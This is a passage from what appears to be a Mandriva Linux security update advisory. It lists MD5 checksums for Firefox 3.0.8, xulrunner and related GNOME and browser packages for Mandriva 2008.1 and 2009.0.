 80be80be988ba040a834329520af4354  2008.1/i586/firefox-is-3.0.8-0.1mdv2008.1.i586.rpm
 eb26fabc9f06d8fb081b0a5c00c7a672  2008.1/i586/firefox-it-3.0.8-0.1mdv2008.1.i586.rpm
 98878410bc9dcd11155d2325f4591f31  2008.1/i586/firefox-ja-3.0.8-0.1mdv2008.1.i586.rpm
 1e816330859281fd14b480a89480b630  2008.1/i586/firefox-ka-3.0.8-0.1mdv2008.1.i586.rpm
 55439b4db6afd35739ee4ae441774b9e  2008.1/i586/firefox-kn-3.0.8-0.1mdv2008.1.i586.rpm
 e0700c34120e5bb754a441315dcad8b7  2008.1/i586/firefox-ko-3.0.8-0.1mdv2008.1.i586.rpm
 0077159f91025addd5fe9bb3ef5a8f33  2008.1/i586/firefox-ku-3.0.8-0.1mdv2008.1.i586.rpm
 c1907653fcbc96570f148a7cfdf020e3  2008.1/i586/firefox-lt-3.0.8-0.1mdv2008.1.i586.rpm
 944aec46320a4f918f8d582c2fa1f2ad  2008.1/i586/firefox-lv-3.0.8-0.1mdv2008.1.i586.rpm
 7f60e0a782a78ca307f6cfff93b36f8f  2008.1/i586/firefox-mk-3.0.8-0.1mdv2008.1.i586.rpm
 40a728c57c54c77ad4e68d7d0cd209fb  2008.1/i586/firefox-mn-3.0.8-0.1mdv2008.1.i586.rpm
 93aa230cfc2572aabe4c67280cfe603c  2008.1/i586/firefox-mr-3.0.8-0.1mdv2008.1.i586.rpm
 ae43357893a3bbd3f3f3d90aae82181b  2008.1/i586/firefox-nb_NO-3.0.8-0.1mdv2008.1.i586.rpm
 9f27adfc3c1d4a087512cd50ba0d25ed  2008.1/i586/firefox-nl-3.0.8-0.1mdv2008.1.i586.rpm
 de5d4291c991e3688ef166700a4d07d3  2008.1/i586/firefox-nn_NO-3.0.8-0.1mdv2008.1.i586.rpm
 dae65314729531566e6d31ccc935a4bc  2008.1/i586/firefox-oc-3.0.8-0.1mdv2008.1.i586.rpm
 a9a3e0ac2a732b12c495aab782e639ea  2008.1/i586/firefox-pa_IN-3.0.8-0.1mdv2008.1.i586.rpm
 537b27d63628256a97dbce794f6f531c  2008.1/i586/firefox-pl-3.0.8-0.1mdv2008.1.i586.rpm
 204d49e9639acba9647ebd9bc3f55fb9  2008.1/i586/firefox-pt_BR-3.0.8-0.1mdv2008.1.i586.rpm
 c88e51d25f8c5410deed8d36661060ac  2008.1/i586/firefox-pt_PT-3.0.8-0.1mdv2008.1.i586.rpm
 0e111e4952cfb4c04d7d1450f1e0f0ed  2008.1/i586/firefox-ro-3.0.8-0.1mdv2008.1.i586.rpm
 ab89908fd7347b80e146e15521c35f51  2008.1/i586/firefox-ru-3.0.8-0.1mdv2008.1.i586.rpm
 192e9b17dbdec8ddcf4bf1157253646c  2008.1/i586/firefox-si-3.0.8-0.1mdv2008.1.i586.rpm
 92956bcca7f303db1362ceab59a05542  2008.1/i586/firefox-sk-3.0.8-0.1mdv2008.1.i586.rpm
 886426aafffb1d8086110db59cb8491c  2008.1/i586/firefox-sl-3.0.8-0.1mdv2008.1.i586.rpm
 80cac4dab3f765d1997654dded72071b  2008.1/i586/firefox-sq-3.0.8-0.1mdv2008.1.i586.rpm
 ad8c6f85c9058fe17a8520f7e4eafb50  2008.1/i586/firefox-sr-3.0.8-0.1mdv2008.1.i586.rpm
 e1ab2beac655084f8abdddae6c1221b8  2008.1/i586/firefox-sv_SE-3.0.8-0.1mdv2008.1.i586.rpm
 5f2b5073609cf7e7b41d5d97639a3e6e  2008.1/i586/firefox-te-3.0.8-0.1mdv2008.1.i586.rpm
 22820110936ac6bbe6219d45f8e269c8  2008.1/i586/firefox-th-3.0.8-0.1mdv2008.1.i586.rpm
 61f092acbb29b0f250c3c50296d70ece  2008.1/i586/firefox-tr-3.0.8-0.1mdv2008.1.i586.rpm
 e03ffd3d66515fa91d1f831e9170d90a  2008.1/i586/firefox-uk-3.0.8-0.1mdv2008.1.i586.rpm
 b436ee715d6803a299bbd28a0ca05f48  2008.1/i586/firefox-zh_CN-3.0.8-0.1mdv2008.1.i586.rpm
 6d7adf5eeda0936d4338ba861861ee76  2008.1/i586/firefox-zh_TW-3.0.8-0.1mdv2008.1.i586.rpm
 4ce1dcf5f5626074602c38f16f71358d  2008.1/i586/galeon-2.0.7-0.4mdv2008.1.i586.rpm
 ad0e170d559fcb92ad523fd9ce9d2f29  2008.1/i586/gnome-python-extras-2.19.1-10.10mdv2008.1.i586.rpm
 39a80e177ae8788b58aa69ac68cb9ff6  2008.1/i586/gnome-python-gda-2.19.1-10.10mdv2008.1.i586.rpm
 9699e542487ca11ab4e654efc93cec0d  2008.1/i586/gnome-python-gda-devel-2.19.1-10.10mdv2008.1.i586.rpm
 e57fdd156ae019ed0991b123712e8634  2008.1/i586/gnome-python-gdl-2.19.1-10.10mdv2008.1.i586.rpm
 fd860c0f333eefe542e95b01f31d8b13  2008.1/i586/gnome-python-gksu-2.19.1-10.10mdv2008.1.i586.rpm
 8a204ba844d59a5baf0a8aa2759c0bd9  2008.1/i586/gnome-python-gtkhtml2-2.19.1-10.10mdv2008.1.i586.rpm
 87534af93258cfb791f2989c9f9719ca  2008.1/i586/gnome-python-gtkmozembed-2.19.1-10.10mdv2008.1.i586.rpm
 497b1503b25d4bd8fb08b219670cec3b  2008.1/i586/gnome-python-gtkspell-2.19.1-10.10mdv2008.1.i586.rpm
 181b9e7bfd2ccab2bb956f0e008a7a72  2008.1/i586/libdevhelp-1_0-0.19-3.10mdv2008.1.i586.rpm
 fe3ff3702103745b2994f6089f1c0144  2008.1/i586/libdevhelp-1-devel-0.19-3.10mdv2008.1.i586.rpm
 68ee38e4af4c7d6a3fb9b9b3ad18c070  2008.1/i586/libgluezilla0-1.2.6.1-2.10mdv2008.1.i586.rpm
 95ed4786cac9c55534744d67d42b0392  2008.1/i586/libxulrunner1.9-1.9.0.8-0.1mdv2008.1.i586.rpm
 9acf1c0ef8f6730222a07f25b840b963  2008.1/i586/libxulrunner-devel-1.9.0.8-0.1mdv2008.1.i586.rpm
 23cef54b58c5121035f4a79e20528faf  2008.1/i586/libxulrunner-unstable-devel-1.9.0.8-0.1mdv2008.1.i586.rpm
 e1de1555e30444698d25a45acbb38907  2008.1/i586/mozilla-firefox-ext-blogrovr-1.1.779-2.8mdv2008.1.i586.rpm
 444832424ef7380d95c17f9e89e17945  2008.1/i586/mozilla-firefox-ext-foxmarks-2.0.47.4-2.8mdv2008.1.i586.rpm
 34990e6fa7c43e02a7145c38fccf26b3  2008.1/i586/mozilla-firefox-ext-scribefire-2.2.7-2.8mdv2008.1.i586.rpm
 aa2efc8128ebd22007c52388c12f9fe4  2008.1/i586/totem-2.22.0-4.10mdv2008.1.i586.rpm
 b0594a2fe9cb95d91f7da57b926ffe55  2008.1/i586/totem-common-2.22.0-4.10mdv2008.1.i586.rpm
 6b0d51f71a2d379c0059fd44d7fd21a6  2008.1/i586/totem-gstreamer-2.22.0-4.10mdv2008.1.i586.rpm
 cab656c80fa7644a14afeb060fa40c70  2008.1/i586/totem-mozilla-2.22.0-4.10mdv2008.1.i586.rpm
 896e924650c76528ac5176f46bb553d9  2008.1/i586/totem-mozilla-gstreamer-2.22.0-4.10mdv2008.1.i586.rpm
 a7e030c71649bc1c72f4226cc5d8c623  2008.1/i586/xulrunner-1.9.0.8-0.1mdv2008.1.i586.rpm
 e19410a42852063ba1e8773e28ef85ea  2008.1/i586/yelp-2.22.1-0.4mdv2008.1.i586.rpm 
 76a10424f4751843e11427064106d6c1  2008.1/SRPMS/devhelp-0.19-3.10mdv2008.1.src.rpm
 e96aae39a47c3c71f0f3e000c5fddf31  2008.1/SRPMS/epiphany-2.22.3-0.5mdv2008.1.src.rpm
 ea7255fae047d474e64c823ac0dfa436  2008.1/SRPMS/firefox-3.0.8-0.1mdv2008.1.src.rpm
 fed269b7af043d235adf6a21799e0fb1  2008.1/SRPMS/firefox-l10n-3.0.8-0.1mdv2008.1.src.rpm
 8589a56271e45ce5d348f013465c6e2b  2008.1/SRPMS/galeon-2.0.7-0.4mdv2008.1.src.rpm
 eab6ae4650efac252fa49871651e2d89  2008.1/SRPMS/gluezilla-1.2.6.1-2.10mdv2008.1.src.rpm
 3fbee9b941db9cf1ff382bc9e384d24c  2008.1/SRPMS/gnome-python-extras-2.19.1-10.10mdv2008.1.src.rpm
 7c12112195e5cca616c9b30bf63149f4  2008.1/SRPMS/mozilla-firefox-ext-blogrovr-1.1.779-2.8mdv2008.1.src.rpm
 300c4952fd1ba9957a1b43af1cf39a13  2008.1/SRPMS/mozilla-firefox-ext-foxmarks-2.0.47.4-2.8mdv2008.1.src.rpm
 eb2faa67a06dbfbe0328af45f57aa13a  2008.1/SRPMS/mozilla-firefox-ext-scribefire-2.2.7-2.8mdv2008.1.src.rpm
 1f105122379cbcb30a772aea0968c8d6  2008.1/SRPMS/totem-2.22.0-4.10mdv2008.1.src.rpm
 dff4bb1e2b5ee5dac6e7453811c7f0a0  2008.1/SRPMS/xulrunner-1.9.0.8-0.1mdv2008.1.src.rpm
 b489016c89dfb4ca305902e4639bd5dd  2008.1/SRPMS/yelp-2.22.1-0.4mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 cfc2f8d3d4fd55cf2e6ad14b406c855d  2008.1/x86_64/devhelp-0.19-3.10mdv2008.1.x86_64.rpm
 0cad2882763a5e7e4e8ee0a3d86eb6b9  2008.1/x86_64/devhelp-plugins-0.19-3.10mdv2008.1.x86_64.rpm
 48aa404f2fed71f380a9aa2e53eff8be  2008.1/x86_64/epiphany-2.22.3-0.5mdv2008.1.x86_64.rpm
 62ff4f48352b3b269139448106ab2c7e  2008.1/x86_64/epiphany-devel-2.22.3-0.5mdv2008.1.x86_64.rpm
 d3649865d3751b31e03a830a59c335ec  2008.1/x86_64/firefox-3.0.8-0.1mdv2008.1.x86_64.rpm
 c8452a89e201c4b8d145ee0c8083d2a2  2008.1/x86_64/firefox-af-3.0.8-0.1mdv2008.1.x86_64.rpm
 6601f9b0c768baf9caee06d55ea7d611  2008.1/x86_64/firefox-ar-3.0.8-0.1mdv2008.1.x86_64.rpm
 b60392deb5c22882c38c4f4c4269b7c5  2008.1/x86_64/firefox-be-3.0.8-0.1mdv2008.1.x86_64.rpm
 6260467462108d1c9b3dc85ebecc5bea  2008.1/x86_64/firefox-bg-3.0.8-0.1mdv2008.1.x86_64.rpm
 3e597fa5124eda73d370e54d704285ce  2008.1/x86_64/firefox-bn-3.0.8-0.1mdv2008.1.x86_64.rpm
 1f013fcf1f7b46efede14735d5598528  2008.1/x86_64/firefox-ca-3.0.8-0.1mdv2008.1.x86_64.rpm
 16574f238443868b23236837a70bbba8  2008.1/x86_64/firefox-cs-3.0.8-0.1mdv2008.1.x86_64.rpm
 9e4edc3b44826eb8695654b45e64b391  2008.1/x86_64/firefox-cy-3.0.8-0.1mdv2008.1.x86_64.rpm
 4bfce68871c5c8add4e6cda13715d292  2008.1/x86_64/firefox-da-3.0.8-0.1mdv2008.1.x86_64.rpm
 550c82024c7f7501903c4db711186caa  2008.1/x86_64/firefox-de-3.0.8-0.1mdv2008.1.x86_64.rpm
 01c7681130a9b232a9d2f0db2bc9548c  2008.1/x86_64/firefox-el-3.0.8-0.1mdv2008.1.x86_64.rpm
 663265d7208c126cd7eeb6a362cd996e  2008.1/x86_64/firefox-en_GB-3.0.8-0.1mdv2008.1.x86_64.rpm
 df69f2fdc75e3b58306ff58dab8faed1  2008.1/x86_64/firefox-eo-3.0.8-0.1mdv2008.1.x86_64.rpm
 8529132c779a845b4e494231faa37fde  2008.1/x86_64/firefox-es_AR-3.0.8-0.1mdv2008.1.x86_64.rpm
 90183c1a57689e674182c9ecaf173597  2008.1/x86_64/firefox-es_ES-3.0.8-0.1mdv2008.1.x86_64.rpm
 02df956027df2260b89305ed75adf376  2008.1/x86_64/firefox-et-3.0.8-0.1mdv2008.1.x86_64.rpm
 de8c9d3d459026d358387b15b35a4d98  2008.1/x86_64/firefox-eu-3.0.8-0.1mdv2008.1.x86_64.rpm
 76c463b4586018921841a9cfab86f3bf  2008.1/x86_64/firefox-fi-3.0.8-0.1mdv2008.1.x86_64.rpm
 243e5fd01645ea81755fa0d6b82b12b7  2008.1/x86_64/firefox-fr-3.0.8-0.1mdv2008.1.x86_64.rpm
 2824f2c6996e630c9544c6f5449f9bb7  2008.1/x86_64/firefox-fy-3.0.8-0.1mdv2008.1.x86_64.rpm
 200736ab266828de646b3bee87856465  2008.1/x86_64/firefox-ga_IE-3.0.8-0.1mdv2008.1.x86_64.rpm
 f12d704bd50e6295d6fa88798513dda9  2008.1/x86_64/firefox-gl-3.0.8-0.1mdv2008.1.x86_64.rpm
 e4ac35073cbbdf051ce315f2ffeaea1d  2008.1/x86_64/firefox-gu_IN-3.0.8-0.1mdv2008.1.x86_64.rpm
 614caa6f866a162a06c79d0824137b46  2008.1/x86_64/firefox-he-3.0.8-0.1mdv2008.1.x86_64.rpm
 414e182e903471ec83000d80c77c0921  2008.1/x86_64/firefox-hi-3.0.8-0.1mdv2008.1.x86_64.rpm
 d3dda3a2c93fdc4ca6971805c57062d2  2008.1/x86_64/firefox-hu-3.0.8-0.1mdv2008.1.x86_64.rpm
 286e129abc0f1d7cacdbf25c8934dbe3  2008.1/x86_64/firefox-id-3.0.8-0.1mdv2008.1.x86_64.rpm
 c5339b7d324f39aa827f6472ad84cb78  2008.1/x86_64/firefox-is-3.0.8-0.1mdv2008.1.x86_64.rpm
 45c72bd52d2062079dbd36215c71d95b  2008.1/x86_64/firefox-it-3.0.8-0.1mdv2008.1.x86_64.rpm
 9b3fa0adfff0f7a0ff6056e95523b167  2008.1/x86_64/firefox-ja-3.0.8-0.1mdv2008.1.x86_64.rpm
 1b04aa87769031b0cfee22daed466eaf  2008.1/x86_64/firefox-ka-3.0.8-0.1mdv2008.1.x86_64.rpm
 c28735405c3f84c83716163ca08d41e6  2008.1/x86_64/firefox-kn-3.0.8-0.1mdv2008.1.x86_64.rpm
 ad4a35cc0b21fb2e71a5264d507cb7e7  2008.1/x86_64/firefox-ko-3.0.8-0.1mdv2008.1.x86_64.rpm
 13ddcb5ad0683d48f3cf3f9fc1968dc3  2008.1/x86_64/firefox-ku-3.0.8-0.1mdv2008.1.x86_64.rpm
 ca8c4d2fd5b8c149137c558c29391e9d  2008.1/x86_64/firefox-lt-3.0.8-0.1mdv2008.1.x86_64.rpm
 30953fb2fe767aa99eee037715b98503  2008.1/x86_64/firefox-lv-3.0.8-0.1mdv2008.1.x86_64.rpm
 5f292280fac621fb501686232c60a99c  2008.1/x86_64/firefox-mk-3.0.8-0.1mdv2008.1.x86_64.rpm
 060f7b53de78a104b209e56df55a8566  2008.1/x86_64/firefox-mn-3.0.8-0.1mdv2008.1.x86_64.rpm
 f9a74faa59be3b7a6af94172b79c2a92  2008.1/x86_64/firefox-mr-3.0.8-0.1mdv2008.1.x86_64.rpm
 1a25ad2d96712748e06fb3bf28dafdf6  2008.1/x86_64/firefox-nb_NO-3.0.8-0.1mdv2008.1.x86_64.rpm
 174aba57938fc5815617e270fa3eb9fd  2008.1/x86_64/firefox-nl-3.0.8-0.1mdv2008.1.x86_64.rpm
 befc610349d58cfe7aa558a104d1b748  2008.1/x86_64/firefox-nn_NO-3.0.8-0.1mdv2008.1.x86_64.rpm
 5da0b375d0b405796a841f758dc64819  2008.1/x86_64/firefox-oc-3.0.8-0.1mdv2008.1.x86_64.rpm
 f7b02ac0163deb2882eeb9440d0a2909  2008.1/x86_64/firefox-pa_IN-3.0.8-0.1mdv2008.1.x86_64.rpm
 6b2d973ed38d03d2500cbdb77b694bdd  2008.1/x86_64/firefox-pl-3.0.8-0.1mdv2008.1.x86_64.rpm
 10eedeee7f10a57ba6f2e758c66516d0  2008.1/x86_64/firefox-pt_BR-3.0.8-0.1mdv2008.1.x86_64.rpm
 5aa62ed158b0a240db75594056717d55  2008.1/x86_64/firefox-pt_PT-3.0.8-0.1mdv2008.1.x86_64.rpm
 2114bbde959fe139e1f0cd3aeae54f75  2008.1/x86_64/firefox-ro-3.0.8-0.1mdv2008.1.x86_64.rpm
 ed3dd917930d07cf257b2965d583315c  2008.1/x86_64/firefox-ru-3.0.8-0.1mdv2008.1.x86_64.rpm
 98479bcf0527aa02fd3e79bec725377e  2008.1/x86_64/firefox-si-3.0.8-0.1mdv2008.1.x86_64.rpm
 cd6e5f9d63a1b6926fc400199807837c  2008.1/x86_64/firefox-sk-3.0.8-0.1mdv2008.1.x86_64.rpm
 39af55c13acfa0078366c02e666dc1b5  2008.1/x86_64/firefox-sl-3.0.8-0.1mdv2008.1.x86_64.rpm
 9e601bd098ea6d24cda1ef43ba333433  2008.1/x86_64/firefox-sq-3.0.8-0.1mdv2008.1.x86_64.rpm
 fe9b4ec8a6d36685ebf9c882835c2fb3  2008.1/x86_64/firefox-sr-3.0.8-0.1mdv2008.1.x86_64.rpm
 af87474a62fcd1f72d3a44a650dd7fab  2008.1/x86_64/firefox-sv_SE-3.0.8-0.1mdv2008.1.x86_64.rpm
 94ba2b3621854f5e2d4928523be7259c  2008.1/x86_64/firefox-te-3.0.8-0.1mdv2008.1.x86_64.rpm
 4e0b96c0b81808788bf19256f7e26d25  2008.1/x86_64/firefox-th-3.0.8-0.1mdv2008.1.x86_64.rpm
 4f323906ec465b89701c0d795f26799e  2008.1/x86_64/firefox-tr-3.0.8-0.1mdv2008.1.x86_64.rpm
 bf80fe592d4d894669bd30c0ecca03a1  2008.1/x86_64/firefox-uk-3.0.8-0.1mdv2008.1.x86_64.rpm
 ce228e9a10272947c7293c8ef0f594be  2008.1/x86_64/firefox-zh_CN-3.0.8-0.1mdv2008.1.x86_64.rpm
 7ab91ff618e8d6535c3a196d20336946  2008.1/x86_64/firefox-zh_TW-3.0.8-0.1mdv2008.1.x86_64.rpm
 001b309e76f29a647c0023b445ae2e61  2008.1/x86_64/galeon-2.0.7-0.4mdv2008.1.x86_64.rpm
 259a0041c23f37b383200a9267027a2d  2008.1/x86_64/gnome-python-extras-2.19.1-10.10mdv2008.1.x86_64.rpm
 910d05dc992b95d69b6cab6fb72724eb  2008.1/x86_64/gnome-python-gda-2.19.1-10.10mdv2008.1.x86_64.rpm
 9e9cecc52fa0d6f3a62847b4d2558e8a  2008.1/x86_64/gnome-python-gda-devel-2.19.1-10.10mdv2008.1.x86_64.rpm
 4ba7c7ea173f98355b2c31c959d5478a  2008.1/x86_64/gnome-python-gdl-2.19.1-10.10mdv2008.1.x86_64.rpm
 e85fd09a82ee3060d7452848cd993b0a  2008.1/x86_64/gnome-python-gksu-2.19.1-10.10mdv2008.1.x86_64.rpm
 dd8723dc39a0043d86e1ef75f341e82c  2008.1/x86_64/gnome-python-gtkhtml2-2.19.1-10.10mdv2008.1.x86_64.rpm
 0340199ab3b84c06603aa39bfcdc565a  2008.1/x86_64/gnome-python-gtkmozembed-2.19.1-10.10mdv2008.1.x86_64.rpm
 92b8b040bfb4a0fe7c3e3030da374aff  2008.1/x86_64/gnome-python-gtkspell-2.19.1-10.10mdv2008.1.x86_64.rpm
 8a2ffc59dcea6095754c5f03f2412736  2008.1/x86_64/lib64devhelp-1_0-0.19-3.10mdv2008.1.x86_64.rpm
 abaa00b833959d5d715ef7e6f7d8758c  2008.1/x86_64/lib64devhelp-1-devel-0.19-3.10mdv2008.1.x86_64.rpm
 4ad0d542dbc92b04c9a4f27dacdf4939  2008.1/x86_64/lib64gluezilla0-1.2.6.1-2.10mdv2008.1.x86_64.rpm
 992da12c682d8b70eb80e88b8a8091d9  2008.1/x86_64/lib64xulrunner1.9-1.9.0.8-0.1mdv2008.1.x86_64.rpm
 f3605f7612fda6bec62938c8f8374da5  2008.1/x86_64/lib64xulrunner-devel-1.9.0.8-0.1mdv2008.1.x86_64.rpm
 e3e91659121d3dde3273f20c9d7b0126  2008.1/x86_64/lib64xulrunner-unstable-devel-1.9.0.8-0.1mdv2008.1.x86_64.rpm
 52f2b34c570518726a15d038ef5b24ec  2008.1/x86_64/mozilla-firefox-ext-blogrovr-1.1.779-2.8mdv2008.1.x86_64.rpm
 dd7322177b0014b2f600435b8670160d  2008.1/x86_64/mozilla-firefox-ext-foxmarks-2.0.47.4-2.8mdv2008.1.x86_64.rpm
 3fafdb47aff6d0150c4dc332f5234b5a  2008.1/x86_64/mozilla-firefox-ext-scribefire-2.2.7-2.8mdv2008.1.x86_64.rpm
 7cb27fc95bf070a1e9c2e27fd1cd899e  2008.1/x86_64/totem-2.22.0-4.10mdv2008.1.x86_64.rpm
 bfe6d30e019255994f6c4c4b113efbb4  2008.1/x86_64/totem-common-2.22.0-4.10mdv2008.1.x86_64.rpm
 7e7fec7f6854250422e20b5444629214  2008.1/x86_64/totem-gstreamer-2.22.0-4.10mdv2008.1.x86_64.rpm
 11c4031aace8aa551b7c8c5cf42794f7  2008.1/x86_64/totem-mozilla-2.22.0-4.10mdv2008.1.x86_64.rpm
 dfa5054199951758803d68482c920684  2008.1/x86_64/totem-mozilla-gstreamer-2.22.0-4.10mdv2008.1.x86_64.rpm
 c516a046cb6954b4607fab0e3f384302  2008.1/x86_64/xulrunner-1.9.0.8-0.1mdv2008.1.x86_64.rpm
 495925cb1ea0e9d9e5adc5a17cfe3a6d  2008.1/x86_64/yelp-2.22.1-0.4mdv2008.1.x86_64.rpm 
 76a10424f4751843e11427064106d6c1  2008.1/SRPMS/devhelp-0.19-3.10mdv2008.1.src.rpm
 e96aae39a47c3c71f0f3e000c5fddf31  2008.1/SRPMS/epiphany-2.22.3-0.5mdv2008.1.src.rpm
 ea7255fae047d474e64c823ac0dfa436  2008.1/SRPMS/firefox-3.0.8-0.1mdv2008.1.src.rpm
 fed269b7af043d235adf6a21799e0fb1  2008.1/SRPMS/firefox-l10n-3.0.8-0.1mdv2008.1.src.rpm
 8589a56271e45ce5d348f013465c6e2b  2008.1/SRPMS/galeon-2.0.7-0.4mdv2008.1.src.rpm
 eab6ae4650efac252fa49871651e2d89  2008.1/SRPMS/gluezilla-1.2.6.1-2.10mdv2008.1.src.rpm
 3fbee9b941db9cf1ff382bc9e384d24c  2008.1/SRPMS/gnome-python-extras-2.19.1-10.10mdv2008.1.src.rpm
 7c12112195e5cca616c9b30bf63149f4  2008.1/SRPMS/mozilla-firefox-ext-blogrovr-1.1.779-2.8mdv2008.1.src.rpm
 300c4952fd1ba9957a1b43af1cf39a13  2008.1/SRPMS/mozilla-firefox-ext-foxmarks-2.0.47.4-2.8mdv2008.1.src.rpm
 eb2faa67a06dbfbe0328af45f57aa13a  2008.1/SRPMS/mozilla-firefox-ext-scribefire-2.2.7-2.8mdv2008.1.src.rpm
 1f105122379cbcb30a772aea0968c8d6  2008.1/SRPMS/totem-2.22.0-4.10mdv2008.1.src.rpm
 dff4bb1e2b5ee5dac6e7453811c7f0a0  2008.1/SRPMS/xulrunner-1.9.0.8-0.1mdv2008.1.src.rpm
 b489016c89dfb4ca305902e4639bd5dd  2008.1/SRPMS/yelp-2.22.1-0.4mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 f3c10135461a4a23f357887b550a4e29  2009.0/i586/beagle-0.3.8-13.9mdv2009.0.i586.rpm
 0cfe6b62d5b8cb6f70c88fd4b8804356  2009.0/i586/beagle-crawl-system-0.3.8-13.9mdv2009.0.i586.rpm
 3e9b2d878f255ef6f415090865fb359e  2009.0/i586/beagle-doc-0.3.8-13.9mdv2009.0.i586.rpm
 0d78127d987a610da9a1449794c9cce2  2009.0/i586/beagle-epiphany-0.3.8-13.9mdv2009.0.i586.rpm
 411687447135947a0031e3b674080cfd  2009.0/i586/beagle-evolution-0.3.8-13.9mdv2009.0.i586.rpm
 6d187e42971671c2ec4a760343725bcb  2009.0/i586/beagle-gui-0.3.8-13.9mdv2009.0.i586.rpm
 15d03358735b94a46cdee35ed435410b  2009.0/i586/beagle-gui-qt-0.3.8-13.9mdv2009.0.i586.rpm
 534da774b8379bf2faabab661965eeeb  2009.0/i586/beagle-libs-0.3.8-13.9mdv2009.0.i586.rpm
 faf40a04bef5bbc4af6ea77fa775a06f  2009.0/i586/devhelp-0.21-3.5mdv2009.0.i586.rpm
 c806df920a33e5588738585201a44b12  2009.0/i586/devhelp-plugins-0.21-3.5mdv2009.0.i586.rpm
 249136ab1565df8968e702c6b33381d1  2009.0/i586/epiphany-2.24.0.1-3.7mdv2009.0.i586.rpm
 d5f1f46b8ab5536caad5e01bf86caa7e  2009.0/i586/epiphany-devel-2.24.0.1-3.7mdv2009.0.i586.rpm
 b59ae592be551f7cbac5987ec8625231  2009.0/i586/firefox-3.0.8-0.1mdv2009.0.i586.rpm
 cb505cc56a04370a57afe4f2b7647f79  2009.0/i586/firefox-af-3.0.8-0.1mdv2009.0.i586.rpm
 8971ea07c8cc745cfb644eed11ffc8b2  2009.0/i586/firefox-ar-3.0.8-0.1mdv2009.0.i586.rpm
 93223cce1a6644c0fd3a15e4e59c63d3  2009.0/i586/firefox-be-3.0.8-0.1mdv2009.0.i586.rpm
 41e78965ee1a6169818c77ef27316b59  2009.0/i586/firefox-bg-3.0.8-0.1mdv2009.0.i586.rpm
 554136c54924af313cd036ec38fe8278  2009.0/i586/firefox-bn-3.0.8-0.1mdv2009.0.i586.rpm
 37d0dae74e51ff8c414734ab70e2f171  2009.0/i586/firefox-ca-3.0.8-0.1mdv2009.0.i586.rpm
 66a0795b201c5595ae2157d5385e8ed8  2009.0/i586/firefox-cs-3.0.8-0.1mdv2009.0.i586.rpm
 77ef8b455b247250f5f032930a224382  2009.0/i586/firefox-cy-3.0.8-0.1mdv2009.0.i586.rpm
 faab3a752ea37894cd2e97c0b15760ba  2009.0/i586/firefox-da-3.0.8-0.1mdv2009.0.i586.rpm
 0a665c73794442b97fea8e037618cd9b  2009.0/i586/firefox-de-3.0.8-0.1mdv2009.0.i586.rpm
 54283f0a8da769bd6afb0f4c90a08bbe  2009.0/i586/firefox-el-3.0.8-0.1mdv2009.0.i586.rpm
 f8689eb994f0b68104ebf8996b6a6b2f  2009.0/i586/firefox-en_GB-3.0.8-0.1mdv2009.0.i586.rpm
 7b07c7b6ce00e6e333581e0fc34cd059  2009.0/i586/firefox-eo-3.0.8-0.1mdv2009.0.i586.rpm
 c01f1c82a234961b1379189d31ed4ae4  2009.0/i586/firefox-es_AR-3.0.8-0.1mdv2009.0.i586.rpm
 4990f34410f2b9211114f53564b2664b  2009.0/i586/firefox-es_ES-3.0.8-0.1mdv2009.0.i586.rpm
 17181f41803b61e76a6cdcadcb87c5a2  2009.0/i586/firefox-et-3.0.8-0.1mdv2009.0.i586.rpm
 75e23e4819aa4026f6e400798931ac3b  2009.0/i586/firefox-eu-3.0.8-0.1mdv2009.0.i586.rpm
 06cd278e730f4477286b0a87adaf86a7  2009.0/i586/firefox-ext-beagle-0.3.8-13.9mdv2009.0.i586.rpm
 7dcb051eb292eac9b437d771631700e2  2009.0/i586/firefox-ext-mozvoikko-0.9.5-4.5mdv2009.0.i586.rpm
 f1df265e26738b99b5371ac6a8e801e3  2009.0/i586/firefox-fi-3.0.8-0.1mdv2009.0.i586.rpm
 fa3262348d96a7056c5b47496dfa250d  2009.0/i586/firefox-fr-3.0.8-0.1mdv2009.0.i586.rpm
 3a6e21a3c6256def6dc251d093e52fee  2009.0/i586/firefox-fy-3.0.8-0.1mdv2009.0.i586.rpm
 c810c11899ea193732764eb9de1586d3  2009.0/i586/firefox-ga_IE-3.0.8-0.1mdv2009.0.i586.rpm
 297c977a3d9aaee1d215f26d57a66fb2  2009.0/i586/firefox-gl-3.0.8-0.1mdv2009.0.i586.rpm
 785fa1e3f633adba20e348674cc6cbe8  2009.0/i586/firefox-gu_IN-3.0.8-0.1mdv2009.0.i586.rpm
 1be03d26de5c5ac806f0304e84b1779e  2009.0/i586/firefox-he-3.0.8-0.1mdv2009.0.i586.rpm
 f0eeebd5bb63a68a812b98d223ecd1cd  2009.0/i586/firefox-hi-3.0.8-0.1mdv2009.0.i586.rpm
 966f38b8a8fc55692acfda40b8cef21a  2009.0/i586/firefox-hu-3.0.8-0.1mdv2009.0.i586.rpm
 7975e53417af8b029b155a1acf3a2a0e  2009.0/i586/firefox-id-3.0.8-0.1mdv2009.0.i586.rpm
 4dee74c7077bb7946893b3ad29bbd9ab  2009.0/i586/firefox-is-3.0.8-0.1mdv2009.0.i586.rpm
 d7923084d33c149ecc951cdaf0c17884  2009.0/i586/firefox-it-3.0.8-0.1mdv2009.0.i586.rpm
 6b8a85b5975ba5c7b9a3692244d2e8eb  2009.0/i586/firefox-ja-3.0.8-0.1mdv2009.0.i586.rpm
 338acacb2007f3d0bfdadaad1fda4747  2009.0/i586/firefox-ka-3.0.8-0.1mdv2009.0.i586.rpm
 617ad4e355a6c8d035c2cbdb9ba1bf27  2009.0/i586/firefox-kn-3.0.8-0.1mdv2009.0.i586.rpm
 ec418b7efbb6da7d221aecc122f5592d  2009.0/i586/firefox-ko-3.0.8-0.1mdv2009.0.i586.rpm
 345051a796a0fe1663ddddf86bed7262  2009.0/i586/firefox-ku-3.0.8-0.1mdv2009.0.i586.rpm
 dcb8eec1cf86c34f77966be014d70813  2009.0/i586/firefox-lt-3.0.8-0.1mdv2009.0.i586.rpm
 7858db5c430c6cdde072b91a29c97944  2009.0/i586/firefox-lv-3.0.8-0.1mdv2009.0.i586.rpm
 1e5530dfec2e2615730ab20c33f115b4  2009.0/i586/firefox-mk-3.0.8-0.1mdv2009.0.i586.rpm
 4ca125f7e5366daa7dde970661b814a1  2009.0/i586/firefox-mn-3.0.8-0.1mdv2009.0.i586.rpm
 a7159a5bfd056cda517095473e947535  2009.0/i586/firefox-mr-3.0.8-0.1mdv2009.0.i586.rpm
